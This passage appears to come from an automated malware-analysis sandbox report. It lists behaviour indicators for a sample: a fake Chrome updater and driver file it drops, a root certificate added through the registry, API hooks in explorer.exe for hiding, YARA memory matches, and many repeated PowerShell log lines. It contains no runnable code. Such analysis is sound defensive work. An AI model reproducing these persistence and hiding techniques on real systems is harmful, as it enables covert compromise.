                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE2722B8 push rdx; retf 10_2_000002BAAE2722B9
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE2784FD push rcx; retf 003Fh10_2_000002BAAE2784FE
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE2A94FD push rcx; retf 003Fh10_2_000002BAAE2A94FE
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAED922B8 push rdx; retf 10_2_000002BAAED922B9
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAED984FD push rcx; retf 003Fh10_2_000002BAAED984FE
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879A84FD push rcx; retf 003Fh11_2_0000026A879A84FE
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879A22B8 push rdx; retf 11_2_0000026A879A22B9
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537884FD push rcx; retf 003Fh12_2_00000179537884FE
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537822B8 push rdx; retf 12_2_00000179537822B9
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537B94FD push rcx; retf 003Fh12_2_00000179537B94FE
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D594FD push rcx; retf 003Fh12_2_0000017953D594FE
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D5422B8 push rdx; retf 13_2_000002295D5422B9
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D5484FD push rcx; retf 003Fh13_2_000002295D5484FE
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D5794FD push rcx; retf 003Fh13_2_000002295D5794FE
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_00000253067E22B8 push rdx; retf 14_2_00000253067E22B9
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_00000253067E84FD push rcx; retf 003Fh14_2_00000253067E84FE
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E794FD push rcx; retf 003Fh14_2_0000025306E794FE

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to behavior
                Source: Yara matchFile source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeFile created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmpJump to dropped file
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeFile created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJump to dropped file

                Boot Survival

                barindex
                Source: Yara matchFile source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
